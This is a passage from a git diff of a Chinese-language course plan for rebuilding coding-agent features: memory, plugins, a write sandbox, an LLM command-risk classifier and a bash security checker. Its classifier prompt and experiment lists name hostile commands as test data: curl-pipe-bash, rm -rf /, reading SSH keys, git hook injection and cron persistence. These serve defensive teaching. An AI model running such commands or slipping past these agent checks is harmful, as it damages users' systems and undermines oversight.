`utils/permissions/pathValidation.ts` + `utils/bash/sandbox-*.ts` | + +### s22: Cross-Session Memory — 让知识跨会话持久 + +**一句话**: s18 的 Session Memory 是"会话内笔记",s22 的 Memory 是"跨会话知识库"。 + +s18 的 Session Memory 在对话结束时就消失了(或随 compact 重新初始化)。真实 Claude Code 有一个完全独立的记忆系统,从对话中**自动提取**关键知识,写入磁盘,**下次对话自动加载**。 + +s22 引入 `MemoryExtractor` + `MemoryStore`: + +``` +对话结束 (query loop 完成) + │ + ▼ +[extractMemories 触发] + │ Forked agent 分析对话 + │ 识别可持久化的知识 + │ + ▼ +[写入 memory 文件] + │ + ├── ~/.claude/projects/{path}/memory/ + │ ├── MEMORY.md ← 索引文件 + │ ├── user_preferences.md ← 用户偏好 + │ ├── feedback_rules.md ← 用户纠正的规则 + │ ├── project_context.md ← 项目上下文 + │ └── reference_links.md ← 外部引用 + │ + ▼ +[下次对话启动] + │ 读取 MEMORY.md 索引 + │ 注入到系统提示 + │ + ▼ +Agent 已经"记住"了上次学到的知识 +``` + +**4 种记忆类型**: + +| 类型 | 文件名 | 内容 | 示例 | +|------|--------|------|------| +| user | `user_*.md` | 用户角色、偏好、工作习惯 | "用户是数据科学家,偏好 Python" | +| feedback | `feedback_*.md` | 用户纠正的规则(做/不做) | "不要 mock 数据库,用真实连接" | +| project | `project_*.md` | 项目上下文、架构决策 | "认证中间件因合规要求重写" | +| reference | `reference_*.md` | 外部系统指针 | "Pipeline bug 追踪在 Linear INGEST 项目" | + +**MEMORY.md 索引文件**: +- 不是记忆内容本身,而是索引 +- 每条一行:`- [标题](文件名) — 一行摘要` +- 不超过 200 行,超出截断 +- 下次对话时自动加载到系统提示 + +**自动提取触发条件**: +- 每次 query loop 结束时检查 +- 只在主 agent 运行(subagent 不提取) +- 有 feature gate 控制(`tengu_passport_quail`) +- 并发安全:`inProgress` 锁 + trailing extraction + +**关键洞察**: Memory 是 Agent 的"长期记忆",Session Memory 是"短期记忆"。一个好的 Agent 需要两层:短期记住"现在在做什么",长期记住"学到了什么"。 + +**与真实源码的对照**: Claude Code 的记忆系统包括: +- `services/extractMemories/extractMemories.ts` — 主提取逻辑 + - 在 query loop 结束时触发(fire-and-forget) + - Forked agent 分析对话,用 LLM 判断哪些信息值得记住 + - 写入 `~/.claude/projects/{path}/memory/` 目录 + - `drainPendingExtraction()` 确保关机前完成 +- `services/extractMemories/prompts.ts` — 提取 prompt +- `memdir/` — 记忆目录管理、老化、相关性评分 +- 4 种记忆类型:user / feedback / project / reference +- `MEMORY.md` 索引:最多 200 行,每条 `< 150 字符` + +--- + +### s23: Sandbox — 文件系统级隔离 + +**一句话**: s12 用 git worktree 做了目录隔离,s23 用沙箱做写路径隔离。 + +s13 的权限守卫控制"能不能执行",但没有控制"能写哪些文件"。真实 Claude Code 在执行 bash 命令时有一个沙箱层,限制 agent 只能在白名单路径内写文件。 + +s23 引入 `SandboxManager`: + +``` +命令准备执行 + │ + ▼ +[写路径提取] + │ 从命令中提取目标路径 + │ mkdir → 路径参数 + │ cp/mv → 目标路径 + │ echo > → 重定向路径 + │ + ▼ +[沙箱白名单检查] + │ 允许的路径: + │ ├── . (当前工作目录) + │ ├── /tmp/claude/ (临时目录) + │ └── 用户配置的额外路径 + │ + ├─ 路径在白名单内 → 允许 + ├─ 路径在白名单外 → 拒绝 + └─ 沙箱禁用 → 全部允许 +``` + +**沙箱 vs Worktree 的区别**: + +| 维度 | Worktree (s12) | Sandbox (s23) | +|------|---------------|---------------| +| 隔离方式 | 完整目录拷贝 | 写路径白名单 | +| 粒度 | 目录级 | 路径级 | +| 场景 | 多 agent 并行开发 | 单 agent 写保护 | +| 成本 | 高(git worktree) | 低(路径检查) | +| 可组合 | 可以嵌套 | 可以嵌套 | + +**关键洞察**: 沙箱不是"你不能做",而是"你只能在这些范围内做"。好的沙箱给 agent 足够的自由度(在项目目录内自由操作),同时保护关键路径(/etc/、~/.ssh/、其他项目目录)。 + +**与真实源码的对照**: Claude Code 的沙箱系统分布在: +- `utils/permissions/pathValidation.ts` — 路径验证和沙箱白名单 + - `pathInAllowedWorkingPath()` — 检查路径是否在白名单内 + - `checkWritablePath()` — 统一写路径检查入口 + - 沙箱白名单默认包含 cwd(`.`) + - 用户可通过配置添加额外路径 +- `utils/bash/sandbox-adapter.ts` — 沙箱适配器 +- 与 readOnlyValidation 联动:只读命令不需要沙箱检查 +- SandboxManager 是全局单例,跟踪启用/禁用状态 + +--- + +## Phase 6 后端课程文件 (Python) + +### 【模块 J】s18: Session Memory (会话记忆) + +**文件**: `agents/s18_session_memory.py` +**预计行数**: ~350 行 +**依赖**: s06 + +#### 核心类 + +```python +SESSION_MEMORY_TEMPLATE = """# Session Title +_A short 5-10 word description_ + +# Current State +_What is being worked on right now_ + +# Task Specification +_What did the user ask to build_ + +# Files and Functions +_Important files and what they contain_ + +# Workflow +_Common commands and their order_ + +# Errors & Corrections +_Errors encountered and fixes_ + +# Codebase Documentation +_System components and how they fit_ + +# Learnings +_What worked, what didn't_ + +# Key Results +_Important outputs_ + +# Worklog +_Step by step summary_ +""" + +class SessionMemoryManager: + def __init__(self, memory_dir: Path = None): + self._dir = memory_dir or WORKDIR / ".session-memory" + self._dir.mkdir(exist_ok=True) + self._memory_file = self._dir / "session-memory.md" + self._last_message_id: str | None = None + self._tokens_at_last_extraction = 0 + self._initialized = False + + # 配置阈值 + MIN_TOKENS_TO_INIT = 10000 # 初始化阈值 + MIN_TOKENS_BETWEEN_UPDATE = 5000 # 增量更新阈值 + MAX_SECTION_TOKENS = 2000 # 单 section 上限 + MAX_TOTAL_TOKENS = 12000 # 总 token 上限 + + def should_extract(self, current_tokens: int, tool_calls: int) -> bool: + if not self._initialized: + if current_tokens >= self.MIN_TOKENS_TO_INIT: + return True + return False + growth = current_tokens - self._tokens_at_last_extraction + return growth >= self.MIN_TOKENS_BETWEEN_UPDATE + + def extract(self, messages: list, client, model) -> None: + """用 LLM 从对话中提取结构化笔记""" + current = self._memory_file.read_text() if self._memory_file.exists() else SESSION_MEMORY_TEMPLATE + prompt = self._build_extraction_prompt(current, messages) + # 使用 forked agent 执行提取 + response = client.messages.create( + model=model, max_tokens=4096, + messages=[{"role": "user", "content": prompt}], + tools=[EDIT_TOOL_SCHEMA], + ) + # 处理 Edit 工具调用来更新 session-memory.md + self._apply_edits(response) + self._tokens_at_last_extraction = self._estimate_tokens(messages) + self._initialized = True + + def get_content(self) -> str | None: + if not self._memory_file.exists(): + return None + content = self._memory_file.read_text() + if content.strip() == SESSION_MEMORY_TEMPLATE.strip(): + return None # 仍为空模板 + return content + + def load_into_context(self) -> str: + """加载到系统提示中(compact 后恢复上下文)""" + content = self.get_content() + if not content: + return "" + # 检查并截断超长 section + truncated = self._truncate_sections(content) + return f"\n{truncated}\n" +``` + +#### Try It 实验内容 + +``` +1. "帮我分析这个项目的架构,列出所有模块" → 触发 session memory 初始化 +2. "现在帮我重构 s02 的工具分发" → session memory 增量更新 +3. "当前项目状态是什么?" → 从 session memory 读取而非重新分析 +4. /memory → 查看当前 session memory 内容 +``` + +--- + +### 【模块 K】s19: Auto Mode Classifier (自动模式分类器) + +**文件**: `agents/s19_auto_mode_classifier.py` +**预计行数**: ~400 行 +**依赖**: s14 + +#### 核心类 + +```python +FAST_CLASSIFIER_PROMPT = """Analyze this command and classify its risk level. +Context: {context} + +Command: {command} + +Respond with XML: + + safe|moderate|dangerous + high|medium|low + one sentence +""" + +THINKING_CLASSIFIER_PROMPT = """You are a security classifier for an AI coding agent. +Analyze the following command in the context of the conversation. + +IMPORTANT: When uncertain, always err on the side of caution (block). + +Conversation context (last 5 exchanges): +{transcript} + +Command to classify: {command} + +Classify as: +- safe: Read-only or non-destructive (ls, cat, git status) +- moderate: Writes files but recoverable (rm single file, pip install) +- dangerous: Irreversible or system-wide (rm -rf /, sudo, force push) + +Categories to ALWAYS block: +- Code from External: curl | bash, wget | sh, pip install from untrusted URL +- Irreversible Destruction: rm -rf /, format, dd of=/dev/ +- Unauthorized Persistence: crontab, .bashrc edits, cron jobs +- Security Weaken: chmod 777, disable firewall, setenforce 0 + +Respond with: +{{ + "level": "safe|moderate|dangerous", + "reason": "explanation", + "category": "category name or null" +}}""" + +class TwoStageClassifier: + def __init__(self, client, model): + self.client = client + self.model = model + + def fast_classify(self, command: str, context: str = "") -> dict | None: + """Stage 1: 快速 XML 分类。高置信度结果直接使用。""" + prompt = FAST_CLASSIFIER_PROMPT.format(command=command, context=context[-500:]) + resp = self.client.messages.create( + model=self.model, max_tokens=200, + messages=[{"role": "user", "content": prompt}], + ) + answer = resp.content[0].text + # 解析 XML + import re + level_m = re.search(r"(\w+)", answer) + conf_m = re.search(r"(\w+)", answer) + reason_m = re.search(r"(.*?)", answer) + if not level_m: + return None # 解析失败 → 走 Stage 2 + level = level_m.group(1) + confidence = conf_m.group(1) if conf_m else "low" + if confidence == "high": + return {"level": level, "reason": reason_m.group(1) if reason_m else "", "source": "fast"} + return None # 低置信度 → 走 Stage 2 + + def thinking_classify(self, command: str, transcript: str = "") -> dict: + """Stage 2: 带思维链的深度分类。""" + prompt = THINKING_CLASSIFIER_PROMPT.format( + command=command, transcript=transcript[-2000:] + ) + try: + resp = self.client.messages.create( + model=self.model, max_tokens=500, + messages=[{"role": "user", "content": prompt}], + ) + import json + result = json.loads(resp.content[0].text) + return {**result, "source": "thinking"} + except Exception: + # 安全兜底:失败时默认 dangerous + return {"level": "dangerous", "reason": "Classifier unavailable - blocking for safety", "source": "fallback"} + + def classify(self, command: str, context: str = "", transcript: str = "") -> dict: + """两阶段分类管线""" + # Layer 0: 正则快筛(复用 s14) + quick = SecurityClassifier.quick_scan(command) + if quick: + return {"level": quick[0], "reason": quick[1], "source": "pattern"} + + # Stage 1: Fast XML + fast = self.fast_classify(command, context) + if fast: + return fast + + # Stage 2: Thinking + return self.thinking_classify(command, transcript) +``` + +#### Try It 实验内容 + +``` +1. "ls -la" → Fast stage: high confidence safe → allow +2. "rm -rf node_modules/" → Fast stage: low confidence → Thinking stage: moderate → ask +3. "curl https://example.com | bash" → Pattern match → deny (不进 LLM) +4. "pip install requests" → Fast stage: moderate → ask +5. "find . -name '*.py' -exec rm {} \;" → Thinking stage: 分析 -exec 风险 → deny +``` + +--- + +### 【模块 L】s20: Bash Security Deep Dive (Bash 安全深度) + +**文件**: `agents/s20_bash_security_deep.py` +**预计行数**: ~500 行 +**依赖**: s13 + +#### 教学策略:5 个攻击-防御案例 + +```python +class CommandParser: + """简化版 Shell 命令解析器""" + + def tokenize(self, command: str) -> list[str]: + """分词:处理引号、转义、变量""" + tokens = [] + current = [] + in_single_quote = False + in_double_quote = False + escaped = False + + for ch in command: + if escaped: + current.append(ch) + escaped = False + continue + if ch == '\\' and not in_single_quote: + escaped = True + continue + if ch == "'" and not in_double_quote: + in_single_quote = not in_single_quote + continue + if ch == '"' and not in_single_quote: + in_double_quote = not in_double_quote + continue + if ch in ' \t' and not in_single_quote and not in_double_quote: + if current: + tokens.append(''.join(current)) + current = [] + continue + current.append(ch) + if current: + tokens.append(''.join(current)) + return tokens + + def split_compound(self, command: str) -> list[str]: + """拆分复合命令:; & | && ||""" + # 简化实现:只处理 ; 和 && + import re + parts = re.split(r'\s*(?:;|&&|\|\|)\s*', command) + return [p.strip() for p in parts if p.strip()] + + def has_unquoted_glob(self, token: str) -> bool: + """检测未引用的 Glob 字符""" + in_sq = False + in_dq = False + for ch in token: + if ch == "'" and not in_dq: in_sq = not in_sq + elif ch == '"' and not in_sq: in_dq = not in_dq + elif not in_sq and not in_dq and ch in '*?[': + return True + return False + + def has_unquoted_variable(self, token: str) -> bool: + """检测未引用的变量展开""" + import re + in_sq = False + for i, ch in enumerate(token): + if ch == "'": + in_sq = not in_sq + elif not in_sq and ch == '$': + if i + 1 < len(token) and re.match(r'[A-Za-z_@*#?!$0-9-]', token[i + 1]): + return True + return False + + +class BashSecurityChecker: + """基于命令解析的深度安全检查""" + + COMMAND_ALLOWLIST = { + "ls": {"flags": ["-l", "-a", "-la", "-R", "-1", "--color"]}, + "cat": {"flags": ["-n", "-b", "-s"]}, + "head": {"flags": ["-n", "-c"]}, + "tail": {"flags": ["-n", "-c", "-f"]}, + "git": {"subcommands": ["status", "log", "diff", "branch", "show", "blame"]}, + "grep": {"flags": ["-r", "-i", "-n", "-c", "-l", "-v", "-E"]}, + "find": {"blocked_flags": ["-exec", "-execdir", "-delete", "-ok"]}, + } + + GIT_INTERNAL_PATHS = ["HEAD", "objects/", "refs/", "hooks/"] + + def check(self, command: str) -> dict: + parser = CommandParser() + subcommands = parser.split_compound(command) + + # 案例 1: 复合命令逐条检查 + has_git = any(sc.strip().startswith("git") for sc in subcommands) + has_cd = any(sc.strip().startswith("cd") for sc in subcommands) + + # 案例 3: cd + git 组合检测 + if has_cd and has_git: + return {"safe": False, "reason": "cd + git combo: potential sandbox escape via cd to malicious dir"} + + for subcmd in subcommands: + tokens = parser.tokenize(subcmd) + if not tokens: + continue + + # 案例 2: Glob 检测 + for token in tokens[1:]: + if parser.has_unquoted_glob(token): + return {"safe": False, "reason": f"Unquoted glob in '{token}': could expand to dangerous args"} + if parser.has_unquoted_variable(token): + return {"safe": False, "reason": f"Unquoted variable in '{token}': could expand to anything"} + + # 白名单检查 + base = tokens[0] + if base in self.COMMAND_ALLOWLIST: + config = self.COMMAND_ALLOWLIST[base] + if "flags" in config: + for flag in tokens[1:]: + if flag.startswith("-") and flag not in config["flags"]: + return {"safe": False, "reason": f"Flag '{flag}' not in allowlist for {base}"} + + # 案例 4: Git 内部路径检测 + for token in tokens: + for pattern in self.GIT_INTERNAL_PATHS: + if pattern in token: + return {"safe": False, "reason": f"Git internal path '{pattern}' detected: potential hook injection"} + + return {"safe": True, "reason": ""} +``` + +#### 5 个攻击-防御实验 + +``` +1. "ls; rm -rf /" → 复合命令拆分 → rm -rf / 被 deny +2. "echo *.py > output.txt" → Glob 检测 → 阻止(* 可能展开) +3. "cd /tmp/evil && git status" → cd + git 组合 → 阻止 +4. "mkdir hooks && echo '#!' > hooks/pre-commit && git status" + → Git 内部路径写检测 → 阻止 +5. "cat $HOME/.ssh/id_rsa" → 变量展开检测 → 阻止($ 未引用) +``` + +--- + +### 【模块 M】s21: Plugin System (插件系统) + +**文件**: `agents/s21_plugin_system.py` +**预计行数**: ~300 行 +**依赖**: s05, s15, s16 + +#### 核心类 + +```python +@dataclass +class PluginManifest: + name: str + version: str + description: str + skills: list[str] = field(default_factory=list) + hooks: dict[str, str] = field(default_factory=dict) # event -> handler script + mcp_servers: dict[str, dict] = field(default_factory=dict) # server_name -> config + +class PluginManager: + def __init__(self, plugins_dir: Path = None): + self._dir = plugins_dir or WORKDIR / ".plugins" + self._dir.mkdir(exist_ok=True) + self._plugins: dict[str, PluginManifest] = {} + self._enabled: set[str] = set() + self._settings_file = self._dir / "settings.json" + + def discover(self) -> list[PluginManifest]: + """扫描插件目录,加载所有 manifest.json""" + manifests = [] + for plugin_dir in sorted(self._dir.iterdir()): + manifest_path = plugin_dir / "manifest.json" + if manifest_path.exists(): + data = json.loads(manifest_path.read_text()) + m = PluginManifest( + name=data["name"], version=data.get("version", "1.0.0"), + description=data.get("description", ""), + skills=data.get("skills", []), + hooks=data.get("hooks", {}), + mcp_servers=data.get("mcpServers", {}), + ) + self._plugins[m.name] = m + manifests.append(m) + self._load_settings() + return manifests + + def enable(self, name: str) -> bool: + if name in self._plugins: + self._enabled.add(name) + self._save_settings() + return True + return False + + def disable(self, name: str) -> bool: + if name in self._enabled: + self._enabled.discard(name) + self._save_settings() + return True + return False + + def get_skills(self) -> list[dict]: + """返回所有已启用插件的 Skills""" + skills = [] + for name in self._enabled: + plugin = self._plugins.get(name) + if not plugin: + continue + for skill_file in plugin.skills: + skill_path = self._dir / name / skill_file + if skill_path.exists(): + skills.append({ + "name": f"{name}:{skill_file.stem}", + "description": skill_path.read_text()[:200], + "plugin": name, + "path": str(skill_path), + }) + return skills + + def get_hooks(self) -> dict[str, list]: + """返回所有已启用插件的 Hooks""" + hooks = {} + for name in self._enabled: + plugin = self._plugins.get(name) + if not plugin: + continue + for event, script in plugin.hooks.items(): + hooks.setdefault(event, []).append({ + "plugin": name, + "script": str(self._dir / name / script), + }) + return hooks + + def list_plugins(self) -> str: + lines = [] + for name, m in self._plugins.items(): + status = "enabled" if name in self._enabled else "disabled" + skills_count = len(m.skills) + hooks_count = len(m.hooks) + mcp_count = len(m.mcp_servers) + lines.append(f" {name} v{m.version} [{status}]") + lines.append(f" {m.description}") + lines.append(f" skills: {skills_count}, hooks: {hooks_count}, mcp: {mcp_count}") + return "\n".join(lines) +``` + +#### Try It 实验内容 + +``` +1. /plugin list → 查看已安装插件 +2. /plugin enable db-assistant → 启用插件(加载 skills + hooks + MCP) +3. "帮我查一下 users 表有多少行" → 插件的 MCP 工具被调用 +4. /plugin disable db-assistant → 禁用插件 +5. /plugin install code-reviewer → 从目录安装新插件 +``` + +--- + +## Phase 6 前端更新 + +### constants.ts 新增 + +```typescript +// VERSION_META 新增 s18-s21 +s18: { + title: "Session Memory", + subtitle: "Compression That Doesn't Lose Information", + coreAddition: "SessionMemoryManager with 10-section template and token budget", + keyInsight: "上下文管理的终极形态不是压缩而是提取 — 压缩是被动防御,提取是主动积累", + layer: "production", + prevVersion: "s06", +}, +s19: { + title: "Auto Mode Classifier", + subtitle: "Two-Stage LLM Security Classification", + coreAddition: "TwoStageClassifier: Fast XML + Thinking deep analysis", + keyInsight: "生产级分类器的核心是安全兜底 + 成本优化:80% 简单判断 Fast 处理,20% 复杂情况 Thinking 处理", + layer: "production", + prevVersion: "s14", +}, +s20: { + title: "Bash Security Deep Dive", + subtitle: "2000 Lines of Safety Checks Decomposed", + coreAddition: "CommandParser + FlagValidator + GlobDetector + GitPathProtection", + keyInsight: "安全检查的敌人不是危险命令,而是看起来无害但能被组合利用的命令", + layer: "production", + prevVersion: "s13", +}, +s21: { + title: "Plugin System", + subtitle: "Skills, Hooks, and MCP in One Container", + coreAddition: "PluginManager with manifest-based skill/hook/MCP composition", + keyInsight: "Plugin 不是新概念而是现有机制的组合模式 — 好的架构不需要新概念只需要好的组合", + layer: "production", + prevVersion: "s05", +}, +s22: { + title: "Cross-Session Memory", + subtitle: "Knowledge That Survives Conversations", + coreAddition: "MemoryExtractor + MemoryStore with 4 memory types and MEMORY.md index", + keyInsight: "Memory 是 Agent 的长期记忆,Session Memory 是短期记忆 — 好的 Agent 需要两层", + layer: "production", + prevVersion: "s18", +}, +s23: { + title: "Sandbox Isolation", + subtitle: "Filesystem-Level Write Protection", + coreAddition: "SandboxManager with path whitelist and denyWrite enforcement", + keyInsight: "沙箱不是你不能做,而是你只能在这些范围内做", + layer: "production", + prevVersion: "s13", +}, +``` + +### Layer 更新 + +```typescript +{ id: "production", label: "Production Patterns", color: "#EC4899", versions: ["s18", "s19", "s20", "s21", "s22", "s23"] }, +``` + +### 国际化更新 (三语) + +```json +{ + "sessions": { + "s18": "Session Memory / 会话记忆", + "s19": "Auto Mode Classifier / 自动模式分类器", + "s20": "Bash Security Deep Dive / Bash 安全深度", + "s21": "Plugin System / 插件系统", + "s22": "Cross-Session Memory / 跨会话记忆", + "s23": "Sandbox Isolation / 沙箱隔离" + }, + "layer_labels": { + "production": "Production Patterns / 生产模式" + }, + "viz": { + "s18": "Session Memory Extraction Pipeline", + "s19": "Two-Stage Classifier Flow", + "s20": "Command Parser Security Pipeline", + "s21": "Plugin Architecture Overview", + "s22": "Cross-Session Memory Lifecycle", + "s23": "Sandbox Path Validation" + } +} +``` + +--- + +## Phase 6 分工建议 + +| 模块 | 标签 | 工作量 | 依赖 | +|------|------|--------|------| +| **J** | s18 Session Memory | ~350 行 Python + 3 篇文档 + 可视化 | s06 完成 | +| **K** | s19 Auto Mode Classifier | ~400 行 Python + 3 篇文档 + 可视化 | s14 完成 | +| **L** | s20 Bash Security Deep Dive | ~500 行 Python + 3 篇文档 + 可视化 | s13 完成 | +| **M** | s21 Plugin System | ~300 行 Python + 3 篇文档 + 可视化 | s05 + s15 + s16 完成 | +| **N** | s22 Cross-Session Memory | ~350 行 Python + 3 篇文档 + 可视化 | s18 完成 | +| **O** | s23 Sandbox Isolation | ~250 行 Python + 3 篇文档 + 可视化 | s13 完成 | + +### 执行顺序 + +``` +Phase 5 完成后: + +Week 1: + J(s18) — Session Memory [可独立开发] + K(s19) — Auto Mode Classifier [可独立开发] + O(s23) — Sandbox Isolation [可独立开发,轻量级] + +Week 2: + L(s20) — Bash Security Deep [可独立开发] + M(s21) — Plugin System [依赖 s15 + s16] + N(s22) — Cross-Session Memory [依赖 s18] + +Week 3: + 前端可视化 (6 个新组件) + 文档 (18 篇 Markdown) + s_full.py 更新 + 集成测试 +``` + +--- + +### 【模块 N】s22: Cross-Session Memory (跨会话持久记忆) + +**文件**: `agents/s22_cross_session_memory.py` +**预计行数**: ~350 行 +**依赖**: s18 + +#### 核心类 + +```python +MEMORY_TYPES = ("user", "feedback", "project", "reference") + +@dataclass +class MemoryEntry: + name: str + type: str # user / feedback / project / reference + description: str # 一行摘要,< 150 字符 + content: str # 完整内容 + file_path: Path # 对应的 .md 文件路径 + +class MemoryStore: + """跨会话持久记忆存储""" + + MAX_INDEX_LINES = 200 + + def __init__(self, memory_dir: Path = None): + self._dir = memory_dir or Path.home() / ".learn-claude-code" / "memory" + self._dir.mkdir(parents=True, exist_ok=True) + self._index = self._dir / "MEMORY.md" + + def write_memory(self, entry: MemoryEntry) -> None: + """写入记忆文件""" + # 文件名格式: {type}_{name}.md + filename = f"{entry.type}_{entry.name}.md" + path = self._dir / filename + # 写入 frontmatter + 内容 + content = f"---\nname: {entry.name}\ndescription: {entry.description}\ntype: {entry.type}\n---\n\n{entry.content}" + path.write_text(content) + # 更新索引 + self._update_index() + + def _update_index(self) -> None: + """重建 MEMORY.md 索引""" + lines = ["# Memory Index\n"] + for f in sorted(self._dir.glob("*.md")): + if f.name == "MEMORY.md": + continue + frontmatter = self._parse_frontmatter(f) + if frontmatter: + desc = frontmatter.get("description", "") + lines.append(f"- [{frontmatter['name']}]({f.name}) — {desc}\n") + # 截断到 200 行 + content = "".join(lines[:self.MAX_INDEX_LINES]) + self._index.write_text(content) + + def load_for_context(self) -> str: + """加载索引到系统提示(下次对话时调用)""" + if not self._index.exists(): + return "" + return self._index.read_text() + + def list_memories(self) -> str: + """列出所有记忆""" + if not self._index.exists(): + return "No memories stored yet." + return self._index.read_text() + + def _parse_frontmatter(self, path: Path) -> dict | None: + """解析 YAML frontmatter""" + text = path.read_text() + if not text.startswith("---"): + return None + end = text.find("---", 3) + if end < 0: + return None + frontmatter = {} + for line in text[3:end].strip().split("\n"): + if ":" in line: + key, _, value = line.partition(":") + frontmatter[key.strip()] = value.strip() + return frontmatter + + +class MemoryExtractor: + """从对话中自动提取记忆""" + + EXTRACTION_PROMPT = """Analyze the conversation above and extract knowledge worth remembering across sessions. + +Write each piece of knowledge as a separate memory file. For each memory: +1. Choose a type: user, feedback, project, or reference +2. Write a short name (snake_case, e.g. "prefer_real_db") +3. Write a one-line description (< 150 chars) +4. Write the full content + +Types: +- user: User's role, preferences, working style +- feedback: Rules about what to do/avoid (from corrections) +- project: Architecture decisions, constraints, deadlines +- reference: Pointers to external systems (Linear boards, dashboards) + +Use the write_memory tool for each piece of knowledge. Make 1-3 calls. +If nothing worth remembering, make zero calls and stop.""" + + def __init__(self, store: MemoryStore, client, model): + self.store = store + self.client = client + self.model = model + + def extract(self, messages: list) -> None: + """在 query loop 结束时触发,用 LLM 提取记忆""" + # 构建上下文:最近的消息 + recent = messages[-10:] if len(messages) > 10 else messages + context_text = self._format_messages(recent) + prompt = self.EXTRACTION_PROMPT + "\n\nConversation:\n" + context_text + + # 使用 forked agent 执行(受限工具集:只有 write_memory) + response = self.client.messages.create( + model=self.model, max_tokens=2000, + tools=[self._write_memory_tool_schema()], + messages=[{"role": "user", "content": prompt}], + ) + # 处理 write_memory 工具调用 + for block in response.content: + if block.type == "tool_use" and block.name == "write_memory": + entry = MemoryEntry( + name=block.input["name"], + type=block.input["type"], + description=block.input["description"], + content=block.input["content"], + file_path=self.store._dir / f"{block.input['type']}_{block.input['name']}.md", + ) + self.store.write_memory(entry) +``` + +#### Try It 实验内容 + +``` +1. "我是前端开发,偏好 TypeScript 和 React" → 提取 user 记忆 +2. "不要用 mock,测试必须连接真实数据库" → 提取 feedback 记忆 +3. "这个项目的认证中间件因合规要求重写" → 提取 project 记忆 +4. /memory → 查看所有跨会话记忆 +5. (新对话) "我之前说过什么偏好?" → 从记忆中加载回答 +``` + +--- + +### 【模块 O】s23: Sandbox Isolation (沙箱隔离) + +**文件**: `agents/s23_sandbox_isolation.py` +**预计行数**: ~250 行 +**依赖**: s13 + +#### 核心类 + +```python +from pathlib import Path + +class SandboxManager: + """文件系统级沙箱:限制 agent 只能在白名单路径内写文件""" + + def __init__(self, allowed_paths: list[Path] = None): + self._allowed = set() + self._enabled = True + # 默认允许当前工作目录 + cwd = Path.cwd().resolve() + self._allowed.add(cwd) + # 允许临时目录 + tmp = Path("/tmp/learn-claude-code") + tmp.mkdir(exist_ok=True) + self._allowed.add(tmp) + # 用户自定义路径 + if allowed_paths: + for p in allowed_paths: + self._allowed.add(Path(p).resolve()) + + def enable(self): + self._enabled = True + + def disable(self): + self._enabled = False + + def add_path(self, path: str | Path): + self._allowed.add(Path(path).resolve()) + + def is_write_allowed(self, target_path: str) -> tuple[bool, str]: + """检查目标路径是否在白名单内""" + if not self._enabled: + return True, "Sandbox disabled" + + resolved = Path(target_path).resolve() + + for allowed in self._allowed: + try: + resolved.relative_to(allowed) + return True, f"Path within {allowed}" + except ValueError: + continue + + # 检查是否在允许的路径的子目录内 + return False, f"Path outside sandbox: {resolved} not in allowed paths" + + def check_command(self, command: str) -> tuple[bool, str]: + """从命令中提取写路径并检查""" + import re + # 提取重定向目标 + redirect_match = re.search(r'>\s*(\S+)', command) + if redirect_match: + return self.is_write_allowed(redirect_match.group(1)) + + # 提取常见写命令的目标 + tokens = command.split() + if not tokens: + return True, "Empty command" + + base = tokens[0] + if base in ("mkdir", "touch", "cp", "mv"): + # 最后一个非 flag 参数通常是目标 + targets = [t for t in tokens[1:] if not t.startswith("-")] + if targets: + return self.is_write_allowed(targets[-1]) + + return True, "No write path detected" + + +# 集成到 s13 的 PermissionGuard +class PermissionGuard: + def __init__(self, sandbox: SandboxManager = None): + self.sandbox = sandbox or SandboxManager() + + def check(self, command: str) -> PermissionResult: + # ... s13 的权限检查 ... + + # 额外:沙箱写路径检查 + if self.sandbox: + allowed, reason = self.sandbox.check_command(command) + if not allowed: + return PermissionResult("deny", False, command, f"Sandbox: {reason}") + + # ... 继续正常检查 ... +``` + +#### Try It 实验内容 + +``` +1. "在当前目录创建 test.txt" → 沙箱允许(cwd 在白名单内) +2. "写入 /etc/hosts 文件" → 沙箱拒绝(/etc/ 不在白名单) +3. "echo hello > /tmp/learn-claude-code/output.txt" → 沙箱允许(临时目录在白名单) +4. /sandbox status → 查看当前沙箱白名单 +5. /sandbox add /Users/me/projects → 添加额外允许路径 +``` + +--- + +--- + +## 附录:源码分析详细索引 + +以下是对 `/Users/yanghaoran/Code/claude-code/src/` 的分析索引,供开发 Phase 6 时参考: + +| 子系统 | 源码路径 | 关键文件 | 对应章节 | +|--------|---------|---------|---------| +| **Hooks** | `src/utils/hooks.ts` + `src/hooks/` + `src/services/tools/toolHooks.ts` | `hooks.ts` (~36000 tokens), `toolHooks.ts` | s15 | +| **MCP** | `src/services/mcp/` | `client.ts`, `MCPConnectionManager.tsx`, `types.ts`, `config.ts`, `auth.ts` | s16 | +| **Session Memory** | `src/services/SessionMemory/` | `sessionMemory.ts`, `prompts.ts`, `sessionMemoryUtils.ts` | s18 | +| **Auto Mode** | `src/utils/permissions/yoloClassifier.ts` | 52KB prompt, 两阶段分类器 | s19 | +| **Bash Security** | `src/tools/BashTool/bashSecurity.ts` + `readOnlyValidation.ts` | 2000+ 行安全检查 | s20 | +| **Plugins** | `src/plugins/` + `src/services/plugins/` | `builtinPlugins.ts`, `PluginInstallationManager.ts` | s21 | +| **Compact** | `src/services/compact/` | `compact.ts`, `autoCompact.ts`, `microCompact.ts`, `grouping.ts` | s06/s18 | +| **Memory Extract** | `src/services/extractMemories/` | `extractMemories.ts`, `prompts.ts` | s22 | +| **Memdir** | `src/memdir/` | 记忆目录管理、老化、相关性评分 | s22 | +| **Permission** | `src/utils/permissions/` | `permissions.ts`, `pathValidation.ts`, `bashClassifier.ts` | s13/s20/s23 | +| **Sandbox** | `src/utils/bash/sandbox-adapter.ts` + `utils/permissions/pathValidation.ts` | 沙箱白名单 + denyWrite | s23 | +| **Skills** | `src/skills/` | `bundledSkills.ts`, `loadSkillsDir.ts`, `mcpSkills.ts` | s05/s21 | +| **Coordinator** | `src/coordinator/coordinatorMode.ts` | ~19000 tokens | (未覆盖) | +| **LSP** | `src/services/lsp/` | `LSPServerManager.ts`, `LSPClient.ts` | (未覆盖) | +| **Remote** | `src/remote/` | `RemoteSessionManager.ts`, `SessionsWebSocket.ts` | (未覆盖) | +| **Voice** | `src/services/voice/` | `voice.ts`, `voiceStreamSTT.ts` | (未覆盖) | +| **Vim** | `src/vim/` | 完整 vim 模拟 | (未覆盖) | diff --git a/README-ja.md b/README-ja.md index b033a5f3b..e3b8b5ab8 100644 --- a/README-ja.md +++ b/README-ja.md @@ -106,7 +106,7 @@ Claude Code = 一つの agent loop これがすべてだ。これが全アーキテクチャ。すべてのコンポーネントは Harness メカニズム -- Agent が住む世界の一部。Agent そのものは? Claude だ。モデル。Anthropic が人類の推論とコードの全幅で訓練した。Harness が Claude を賢くしたのではない。Claude 